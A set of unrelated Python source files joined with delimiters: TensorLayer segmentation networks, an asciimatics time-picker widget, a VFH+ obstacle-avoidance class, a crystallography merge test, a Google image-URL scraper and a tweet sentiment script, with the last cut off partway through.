W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
up4 = tl.layers.DeConv2d(conv5, 256, (3, 3), (nx/8, ny/8), (2, 2), name='deconv4')
up4 = tl.layers.ConcatLayer([up4, conv4], 3, name='concat4')
conv4 = tl.layers.Conv2d(up4, 256, (3, 3), act=tf.nn.relu, name='uconv4_1')
conv4 = tl.layers.Conv2d(conv4, 256, (3, 3), act=tf.nn.relu, name='uconv4_2')
up3 = tl.layers.DeConv2d(conv4, 128, (3, 3), (nx/4, ny/4), (2, 2), name='deconv3')
up3 = tl.layers.ConcatLayer([up3, conv3], 3, name='concat3')
conv3 = tl.layers.Conv2d(up3, 128, (3, 3), act=tf.nn.relu, name='uconv3_1')
conv3 = tl.layers.Conv2d(conv3, 128, (3, 3), act=tf.nn.relu, name='uconv3_2')
up2 = tl.layers.DeConv2d(conv3, 64, (3, 3), (nx/2, ny/2), (2, 2), name='deconv2')
up2 = tl.layers.ConcatLayer([up2, conv2], 3, name='concat2')
conv2 = tl.layers.Conv2d(up2, 64, (3, 3), act=tf.nn.relu, name='uconv2_1')
conv2 = tl.layers.Conv2d(conv2, 64, (3, 3), act=tf.nn.relu, name='uconv2_2')
up1 = tl.layers.DeConv2d(conv2, 32, (3, 3), (nx/1, ny/1), (2, 2), name='deconv1')
up1 = tl.layers.ConcatLayer([up1, conv1] , 3, name='concat1')
conv1 = tl.layers.Conv2d(up1, 64, (3, 3), act=tf.nn.relu, name='uconv1_1')
conv1 = tl.layers.Conv2d(conv1, 64, (3, 3), act=tf.nn.relu, name='uconv1_2')
network = tl.layers.Conv2d(conv1, 2, (1, 1), act=tf.nn.sigmoid, name='uconv1')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
def model_VGG16_SharpMask(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_SharpMask" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
#============================================================================
conv5 = tl.layers.Conv2dLayer(pool4, shape = [1, 1, 512, 32], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5')
#==============refine 1=======================
conv4_refine = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv4_refine_1')
conv4_refine = tl.layers.Conv2dLayer(conv4_refine, shape = [3, 3, 64, 32], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv4_refine_2')
refine1_cmb = tl.layers.ConcatLayer([conv4_refine,conv5],
concat_dim = 3, name = 'refine1_cmb')
refine1 = tl.layers.Conv2dLayer(refine1_cmb, shape = [3, 3, 64, 16], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine1')
refine1 = tl.layers.UpSampling2dLayer(refine1,
size = [data_shape[0]//8,data_shape[1]//8], method =0,is_scale = False,name = 'refine1_up' ) # output:[H/8,W/8,16]
#==============refine 2=======================
conv3_refine = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv3_refine_1')
conv3_refine = tl.layers.Conv2dLayer(conv3_refine, shape = [3, 3, 64, 16], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv3_refine_2')
refine2_cmb = tl.layers.ConcatLayer([conv3_refine,refine1],
concat_dim = 3, name = 'refine2_cmb')# output:[H/8,W/8,32]
refine2 = tl.layers.Conv2dLayer(refine2_cmb, shape = [3, 3, 32, 8], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine2')
refine2 = tl.layers.UpSampling2dLayer(refine2,
size = [data_shape[0]//4,data_shape[1]//4], method =0,is_scale = False,name = 'refine2_up' )
#==============refine 3=======================
conv2_refine = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv2_refine_1')
conv2_refine = tl.layers.Conv2dLayer(conv2_refine, shape = [3, 3, 64, 8], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv2_refine_2')
refine3_cmb = tl.layers.ConcatLayer([conv2_refine,refine2],
concat_dim = 3, name = 'refine3_cmb')
refine3 = tl.layers.Conv2dLayer(refine3_cmb, shape = [3, 3, 16, 4], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine3')
refine3 = tl.layers.UpSampling2dLayer(refine3,
size = [data_shape[0]//2,data_shape[1]//2], method =0,is_scale = False,name = 'refine3_up' ) # output:[H/2,W/2,4]
#==============refine 4=======================
conv1_refine = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 64], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv1_refine_1')
conv1_refine = tl.layers.Conv2dLayer(conv1_refine, shape = [3, 3, 64, 4], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='conv1_refine_2')
refine4_cmb = tl.layers.ConcatLayer([conv1_refine,refine3],
concat_dim = 3, name = 'refine4_cmb')# output:[H/8,W/8,192]
refine4 = tl.layers.Conv2dLayer(refine4_cmb, shape = [3, 3, 8, 2], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),strides = [1, 1, 1, 1], padding='SAME', name ='refine4')
refine4 = tl.layers.UpSampling2dLayer(refine4,
size = [data_shape[0],data_shape[1]], method =0,is_scale = False,name = 'refine4_up' )
network = refine4
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob |
__project__ = "o3seespy"
__author__ = "Maxim Millen & Minjie Zhu"
__version__ = "3.1.0.18"
__license__ = "MIT with OpenSees License"
|
# -*- coding: utf-8 -*-
"""This module implements a time picker widget"""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from datetime import datetime
from builtins import range
from asciimatics.event import KeyboardEvent, MouseEvent
from asciimatics.screen import Screen
from asciimatics.widgets.label import Label
from asciimatics.widgets.layout import Layout
from asciimatics.widgets.listbox import ListBox
from asciimatics.widgets.temppopup import _TempPopup
from asciimatics.widgets.widget import Widget
class _TimePickerPopup(_TempPopup):
"""
An internal Frame for editing the currently selected time.
"""
def __init__(self, parent):
"""
:param parent: The widget that spawned this pop-up.
"""
# Construct the Frame
location = parent.get_location()
super(_TimePickerPopup, self).__init__(parent.frame.screen,
parent,
location[0] - 1, location[1] - 2,
10 if parent.include_seconds else 7, 5)
# Build the widget to display the time selection.
self._hours = ListBox(3, [("{:02}".format(x), x) for x in range(24)], centre=True)
self._minutes = ListBox(3, [("{:02}".format(x), x) for x in range(60)], centre=True)
self._seconds = ListBox(3, [("{:02}".format(x), x) for x in range(60)], centre=True)
if self._parent.include_seconds:
layout = Layout([2, 1, 2, 1, 2], fill_frame=True)
else:
layout = Layout([2, 1, 2], fill_frame=True)
self.add_layout(layout)
layout.add_widget(self._hours, 0)
layout.add_widget(Label("\n:", height=3), 1)
layout.add_widget(self._minutes, 2)
if self._parent.include_seconds:
layout.add_widget(Label("\n:", height=3), 3)
layout.add_widget(self._seconds, 4)
self.fix()
# Set up the correct time.
self._hours.value = parent.value.hour
self._minutes.value = parent.value.minute
self._seconds.value = parent.value.second
def _on_close(self, cancelled):
if not cancelled:
self._parent.value = self._parent.value.replace(hour=self._hours.value,
minute=self._minutes.value,
second=self._seconds.value)
class TimePicker(Widget):
"""
A TimePicker widget allows you to pick a time from a compact, temporary, pop-up Frame.
"""
__slots__ = ["_label", "_on_change", "_value", "_child", "include_seconds"]
def __init__(self, label=None, name=None, seconds=False, on_change=None, **kwargs):
"""
:param label: An optional label for the widget.
:param name: The name for the widget.
:param seconds: Whether to include selection of seconds or not.
:param on_change: Optional function to call when the selected time changes.
Also see the common keyword arguments in :py:obj:`.Widget`.
"""
super(TimePicker, self).__init__(name, **kwargs)
self._label = label
self._on_change = on_change
self._value = datetime.now().time()
self._child = None
self.include_seconds = seconds
def update(self, frame_no):
self._draw_label()
# This widget only ever needs display the current selection - the separate Frame does all
# the clever stuff when it has the focus.
(colour, attr, background) = self._pick_colours("edit_text")
self._frame.canvas.print_at(
self._value.strftime("%H:%M:%S" if self.include_seconds else "%H:%M"),
self._x + self._offset,
self._y,
colour, attr, background)
def reset(self):
pass
def process_event(self, event):
if event is not None:
# Handle key or mouse selection events - e.g. click on widget or Enter.
if isinstance(event, KeyboardEvent):
if event.key_code in [Screen.ctrl("M"), Screen.ctrl("J"), ord(" ")]:
event = None
elif isinstance(event, MouseEvent):
if event.buttons != 0:
if self.is_mouse_over(event, include_label=False):
event = None
# Create the pop-up if needed
if event is None:
self._child = _TimePickerPopup(self)
self.frame.scene.add_effect(self._child)
return event
def required_height(self, offset, width):
return 1
@property
def value(self):
"""
The current selected time.
"""
return self._value
@value.setter
def value(self, new_value):
# Only trigger the notification after we've changed the value.
old_value = self._value
self._value = new_value
if old_value != self._value and self._on_change:
self._on_change()
|
from itertools import islice, izip
import math
FAR_AWAY = 256.0 # A dummy far-away distance used instead of zeros in laser scans. [m]
class VFH:
'''
VFH+ implementation. No long-term memory is used, only the obstacles in the last laser scan are taken in account.
The laser is expected to be mounted on the axis in the robot's facing direction.
Modeled after "VFH+: Reliable Obstacle Avoidance for Fast Mobile Robots", I. Ulrich and J. Borenstein.
'''
def __init__(self, laserFOV = math.radians(270), blockingDistance = 0.35, safetyDistance = 0.5, maxRange = 1.4, turnRadius = None, mu1 = 5, mu2 = 2, mu3 = 3, binSize = math.radians(5), verbose = False):
'''
Params:
laserFOV ... Field of view of the laser. [rad]
safetyDistance ... This is a minimal planned distance from obstacles. [m]
maxRange ... Reading further than this threshold are ignored. This makes it possible to use a laser pointing to the ground. [m]
turnRadius ... The maximal turning trajectory of the robot is approximated with a circle with this radius. If None, a holonomic robot is assumed. [m]
mu1, mu2, mu3 ... Parameters of the cost function. mu1 is a weight of a difference between a candidate direction annd the goal direction; mu2 is a weight of a difference between a candidate direction and the current steering direction; mu3 is a weight of difference between a candidate direction and the previously selected direction. mu1 > mu2 + mu3 must hold. TODO: mu2 is currently not used.
binSize ... Angular width of the bins in the histograms. laserFOV should be divisible by binSize. [rad]
verbose ... If verbose is set to True, some debugging information may be printed.
'''
self.scan = None # Laser scan in meters, right side first
self.laserFOV = laserFOV
self.blockingDistance = blockingDistance
self.safetyDistance = safetyDistance
self.maxRange = maxRange
self.turnRadius = turnRadius
self.mu1 = mu1
self.mu2 = mu2
self.mu3 = mu3
self.binSize = binSize
self.verbose = verbose
def __bin(self, angle):
''' Find an index of a bin which the angle falls to. '''
return int( (angle + self.laserFOV / 2.0) / self.binSize)
def __angle(self, bin):
''' Find an angle corresponding to the given bin. '''
return bin * self.binSize + self.binSize / 2.0 - self.laserFOV / 2.0
def __obstDir(self, i):
''' Compute a direction to the obstacle from the scan index. '''
return self.laserFOV * i / (len(self.scan) - 1.0) - self.laserFOV / 2.0
def update(self, data):
scan = [ FAR_AWAY if x == 0 else x for x in data ]
self.scan = scan
def isBlocked(self):
'''Return True if there is an obstacle within self.safetyDistance in front of the robot.'''
if self.scan is None:
return True # better safe than sorry
print "Blocked cond", self.blockingDistance, min(self.scan)
return any( ( x < self.blockingDistance for x in self.scan ) )
def navigate(self, goalDir, prevDir = 0.0, extraObs = []):
''' Find a direction to the goal avoiding obstacles visible in the last scan.
Param:
goalDir ... A direction to the goal. [rad]
prevDir ... A previously selected steering direction. [rad]
extraObs ... A list of extra obstacles. An obstacle is specified in local polar coordinates as a pair (angle, distance) [(rad, m)].
Return:
Either a preferred direction [rad, counter-clockwise], or None.
None is returned whenever there is an obstacle very near or no direction seems reasonable.
'''
if self.scan is None:
print "No scan"
return None
if self.isBlocked():
print "Blocked"
return None
polarHistogram = self.__polarHistogram(extraObs)
if polarHistogram is None:
print "No polar histogram"
return None
binaryPolarHistogram = self.__binaryPolarHistogram(polarHistogram)
maskedPolarHistogram = self.__maskedPolarHistogram(binaryPolarHistogram)
openWindows = self.__openWindows(maskedPolarHistogram)
candidates = self.__candidates(openWindows, goalDir)
dir = self.__bestCandidate(candidates, goalDir, prevDir)
if self.verbose:
s = [ 'x' if x else ' ' for x in maskedPolarHistogram]
if dir is not None:
i = self.__bin(dir)
s = s[:i] + ['.'] + s[i:]
s = ''.join(s)
print "'" + s[::-1] + "'"
print "Dir", dir
return dir
def __polarHistogram(self, extraObs = []):
c2 = 1.0 # Certainty squared. We trust the laser, thus 1.0**2.
a = 0.5 #TODO: How should we set this parameter?
ws = 0.2 # TODO: ? [m]
b = (a - 1.0) * 4.0/ ( (ws-1.0) **2 )
self.__histogramThreshold = c2 * (a - b * (self.maxRange * 0.5)**2) #TODO: This is an ad-hoc unsupported decision. Note: It seems to work, though.
polarHistogram = [0.0] * (1 + self.__bin(self.laserFOV / 2.0))
obstacles = [ (beta, d) for (beta, d) in extraObs if d <= self.maxRange ]
for i in range(len(self.scan)):
d = self.scan[i] # distance [m]
if d > self.maxRange:
continue
beta = self.__obstDir(i) # direction to the obstacle [rad]
obstacles.append( (beta, d) )
for (beta, d) in obstacles:
m = c2 * (a - b * d**2) # cell magnitude
if d < self.blockingDistance: # we are within the safety distance from an obstacle
return None
ratio = self.safetyDistance / d
# if we are within the safetyDistance, asin is undefined => let's HACK
if ratio > 1.0:
ratio = 1.0
elif ratio < -1.0:
ratio = -1.0
gamma = math.asin(ratio) # enlargement angle [rad]
low = max(0, self.__bin( beta - gamma ))
high = min(len(polarHistogram), self.__bin( beta + gamma ))
for j in range(low, high):
polarHistogram[j] += m
return polarHistogram
def __binaryPolarHistogram(self, polarHistogram):
return [ x > self.__histogramThreshold for x in polarHistogram ] #NOTE: No hysteresis. (Unlike in the article)
def __maskedPolarHistogram(self, binaryPolarHistogram):
if self.turnRadius is None: # A holonomic robot.
return binaryPolarHistogram
else:
# !!!!!!
# Note: The implementation below differs from the one in The Article in that:
# a) This one uses polar coordinates.
# b) This one knows, that even an obstacle on the left can block turning to the right.
left = +self.laserFOV / 2.0
right = -self.laserFOV / 2.0
for i in xrange(len(self.scan)):
if self.scan[i] > self.maxRange:
continue
d2 = self.scan[i]**2
beta = self.__obstDir(i) # An angle to the obstacle relative to the facing direction. [m]
if beta > right: # Right-turning to this direction is not blocked yet.
gammaR = beta - (-math.pi) / 2 # Angle to the center of a right-turning trajectory ("right center").
dr2 = d2 + self.turnRadius**2 - 2 * self.scan[i] * self.turnRadius * math.cos(gammaR) # A squared distance of the obstacle from the right center
if dr2 < (self.turnRadius + self.safetyDistance)**2: # A right-blocking obstacle.
right = beta
if beta < left: # Left-turning to this direction is not blocked yet.
gammaL = beta - math.pi / 2 # Angle to the center of a left-turning trajectory ("left center").
dl2 = d2 + self.turnRadius**2 - 2 * self.scan[i] * self.turnRadius * math.cos(gammaL) # A squared distance of the obstacle from the left center.
if dl2 < (self.turnRadius + self.safetyDistance)**2: # A left-blocking obstacle.
left = beta
li = self.__bin(left)
ri = self.__bin(right)
return [ False if binaryPolarHistogram[i] == False and i >= ri and i <= li else True for i in xrange(len(binaryPolarHistogram)) ]
def __openWindows(self, maskedPolarHistogram):
openWindows = []
prev = True
for i in xrange(1 + len(maskedPolarHistogram)):
mask = True if i == len(maskedPolarHistogram) else maskedPolarHistogram[i]
if prev == True and mask == False: # Right edge of a window.
right = self.__angle(i)
if prev == False and mask == True: # Left edge of a window.
left = self.__angle(i - 1)
openWindows.append( (right,left) )
prev = mask
return openWindows
def __candidates(self, openWindows, goalDir):
candidates = []
for (right, left) in openWindows:
if goalDir >= right and goalDir <= left:
candidates.append(goalDir)
# Note: Not distinguishing wide and narrow openings as in The Article.
candidates.append(right)
candidates.append(left)
return candidates
def __bestCandidate(self, candidates, goalDir, prevDir):
bestDir = None
bestCost = None
for dir in candidates:
cost = self.mu1 * abs(dir - goalDir) + self.mu3 * abs(dir - prevDir) #TODO: mu2
if bestDir is None or cost < bestCost:
bestDir = dir
bestCost = cost
return bestDir
def __remask(self, mask, n):
''' Rescales the mask to the given length.'''
m = len(mask)
if m == n:
return mask # no need to do anything
return [ mask[int(round(i * (m - 1) / float(n - 1)))] for i in xrange(n) ]
|
##
from __future__ import absolute_import
from questgen.encoding import encoding
|
import pytest
import numpy as np
import reciprocalspaceship as rs
def test_merge_valueerror(hewl_merged):
"""
Confirm rs.algorithms.merge() raises ValueError when invoked with
merged DataSet
"""
with pytest.raises(ValueError):
merged = rs.algorithms.merge(hewl_merged)
@pytest.mark.parametrize("keys", [
None,
["I", "SIGI"],
["I", "SigI"],
])
@pytest.mark.parametrize("sort", [True, False])
def test_merge(hewl_unmerged, hewl_merged, keys, sort):
"""Test rs.algorithms.merge() against AIMLESS output"""
if keys is None:
merged = rs.algorithms.merge(hewl_unmerged, sort=sort)
elif not (keys[0] in hewl_unmerged.columns and keys[1] in hewl_unmerged.columns):
with pytest.raises(KeyError):
merged = rs.algorithms.merge(hewl_unmerged, keys[0], keys[1], sort=sort)
return
else:
merged = rs.algorithms.merge(hewl_unmerged, keys[0], keys[1], sort=sort)
# Check DataSet attributes
assert merged.merged
assert merged.spacegroup.xhm() == hewl_merged.spacegroup.xhm()
assert merged.cell.a == hewl_merged.cell.a
assert merged.index.is_monotonic_increasing == sort
# Note: AIMLESS zero-fills empty observations, whereas we use NaNs
for key in merged.columns:
assert np.allclose(merged.loc[hewl_merged.index, key].fillna(0),
hewl_merged.loc[hewl_merged.index, key])
|
import argparse
import json
import itertools
import logging
import re
import os
import uuid
import sys
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
REQUEST_HEADER = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"}
def get_soup(url, header):
response = urlopen(Request(url, headers=header))
return BeautifulSoup(response, 'html.parser')
def get_query_url(query):
return "https://www.google.co.in/search?q=%s&source=lnms&tbm=isch" % query
def extract_images_from_soup(soup):
image_elements = soup.find_all("div", {"class": "rg_meta"})
metadata_dicts = (json.loads(e.text) for e in image_elements)
link_type_records = ((d["ou"], d["ity"]) for d in metadata_dicts)
return link_type_records
def extract_images(query, num_images):
url = get_query_url(query)
# logger.info("Souping")
soup = get_soup(url, REQUEST_HEADER)
# logger.info("Extracting image urls")
link_type_records = extract_images_from_soup(soup)
return itertools.islice(link_type_records, num_images)
def get_image_urls(query, num_images=10000):
query = '+'.join(query.split())
# logger.info("Extracting image links")
images = extract_images(query, num_images)
urls = []
for i, (url, image_type) in enumerate(images):
urls.append (url)
return urls
|
"""
@filename: process_tweets.py
@author: Matthew Mayo
@modified: 2014-04-25
@description: Calculates the sentiment score of tweets stored in
<tweet_file> by referencing term-value pairs in the
<sentiment_file>; also calcualtes the length of each tweet;
outputs a triple of form [length, sentiment, capture_session]
with capture_session based on <tweet_file> name
@usage: python process_tweets.py <sentiment_file> <tweet_file>
"""
import sys
import json
"""
Processe the text of a tweet word by word, return sentiment value
"""
def get_sent(sent_dict, tweet_text):
tweet_sent = 0
tweet_words = (tweet_text.replace('\n', '').replace('\t', '').replace(',', '').replace('.', '').rsplit(' '))
# Process tweet
for word in tweet_words:
try:
tweet_sent = tweet_sent + sent_dict[word]
except(KeyError):
pass
return tweet_sent
"""
Parse sentiment file, build a dictionary of word sentiment values
"""
def build_sent_dict(sent_file):
sent_dict = {}
# Process sent file line by line
for line in sent_file:
sent_item = line.replace('\n', '').rsplit('\t')
sent_dict[sent_item[0]] = float(sent_item[1])
return sent_dict
"""
Process tweets, find their sentiment values and lengths
"""
def proc_tweets(sent_dict, tweet_file):
# Process tweets
for line in tweet_file:
try:
tweet = json.loads(line)
try:
place = tweet["place"]
lang = tweet["lang"]
# Only consider English tweets from US
if (place["country_code"] == "US" and lang == "en"):
tweet_text = tweet["text"]
sent = get_sent(sent_dict, tweet_text)
length = len(tweet_text)
# Below partially commented to supress printing of actual tweets
print str(length) + "\t" + str(sent) + "\t" + sys.argv[2] # + "\t" + tweet_text.encode('utf-8')
except(KeyError, TypeError):
pass
except(KeyError):
pass
def main():
sent_file = open(sys.argv[1])
tweet_file = open(sys.argv[2])
